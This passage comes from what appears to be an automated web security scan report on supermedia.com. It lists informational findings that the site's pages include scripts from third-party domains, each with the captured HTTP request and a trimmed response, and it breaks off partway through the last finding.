User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:15 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Yellow Pages Advertising | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.262. http://www.supermedia.com/reputation-monitoring  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /reputation-monitoring

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /reputation-monitoring HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:16 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Reputation Monitoring | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.263. http://www.supermedia.com/social-responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /social-responsibility

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /social-responsibility HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Social Responsibility | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.264. http://www.supermedia.com/social-responsibility/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /social-responsibility/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /social-responsibility/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:23:05 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Social Responsibility | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.265. http://www.supermedia.com/social-responsibility/commitment-to-employees  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /social-responsibility/commitment-to-employees

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /social-responsibility/commitment-to-employees HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:27 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Commitment to Employees | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.266. http://www.supermedia.com/social-responsibility/corporate-governance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /social-responsibility/corporate-governance

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /social-responsibility/corporate-governance HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:22:54 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Corporate Governance | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.267. http://www.supermedia.com/social-responsibility/environmental-sustainability  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /social-responsibility/environmental-sustainability

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /social-responsibility/environmental-sustainability HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:27 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Environmental Sustainability</title>


<link type="t
...[SNIP]...
<!-- If your site already includes jQuery, you can remove the next two lines. -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://search.earth911.com/widget/?id=search1&amp;bgcolor=fefefe&amp;helpcolor=505050&amp;lblwhatcolor=dc7926&amp;lblwherecolor=dc7926&amp;textcolor=&amp;resultcolor=&amp;headingcolor=dc7926&amp;bordercolor=efefef&amp;what=phone+books%20%20%20%20%20%20%20%20&amp;whatexample=newspapers&amp;whereexample=zip+or+city%2C+state&amp;lblwhat=what%3F&amp;lblwhere=where%3F"></script>
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.268. http://www.supermedia.com/social-responsibility/product-use-innovation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /social-responsibility/product-use-innovation

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /social-responsibility/product-use-innovation HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Product Use Innovation | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.269. http://www.supermedia.com/social-responsibility/supply-chain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /social-responsibility/supply-chain

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /social-responsibility/supply-chain HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:28 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Supply Chain and Procurement | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.270. http://www.supermedia.com/spportal/landingpages.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /spportal/landingpages.do

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /spportal/landingpages.do?splash=406 HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:50:30 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 5027
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperMedia
...[SNIP]...
<!--
By use of this code snippet, I agree to the Brightcove Publisher T and C
found at http://corp.brightcove.com/legal/terms_publisher.cfm.
-->

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

19.271. http://www.supermedia.com/support/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /support/contact-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/contact-us HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:26 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Contact SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.272. http://www.supermedia.com/support/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /support/contact-us/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/contact-us/ HTTP/1.1
Host: www.supermedia.com
Proxy-Connection: keep-alive
Referer: http://ir.supermedia.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:10:10 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 24302


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Contact SuperMedia | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.273. http://www.supermedia.com/support/site-map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /support/site-map

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/site-map HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Site Map | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.274. http://www.supermedia.com/trust/privacy-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /trust/privacy-security

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /trust/privacy-security HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:02 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Privacy Policy | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.275. http://www.supermedia.com/trust/social-media-content-disclaimer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /trust/social-media-content-disclaimer

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /trust/social-media-content-disclaimer HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:05 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Social Media Content Disclaimer | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.276. http://www.supermedia.com/trust/terms-of-use  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /trust/terms-of-use

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /trust/terms-of-use HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:05 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Terms of Use | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.277. http://www.supermedia.com/video-ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /video-ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /video-ads HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:13 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Video Ads | SuperMedia.com Advertising</title>


<li
...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.278. http://www.supermedia.com/web-design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /web-design

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web-design HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Web Site Design | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.279. http://www.supermedia.com/web-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /web-hosting

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web-hosting HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:27:25 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Web Hosting | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.280. http://www.supermedia.com/web-sites  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /web-sites

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web-sites HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:26:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Business Web Sites | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.281. http://www.supermedia.com/web-sites/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.supermedia.com
Path:   /web-sites/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web-sites/ HTTP/1.1
Host: www.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762423|check#true#1296760623;

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:21:36 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Business Web Sites | SuperMedia.com Advertising</title>



...[SNIP]...
<div id = "sidebar_icons">
<script type="text/javascript" src="http://www.superpages.com/inc/social/soc.php?cg=3,24,0,1,1,2,3,8,9&ml=1"></script>
...[SNIP]...

19.282. https://www.supermedia.com/about-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
Path:   /about-us

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-us HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/packaged-solutions
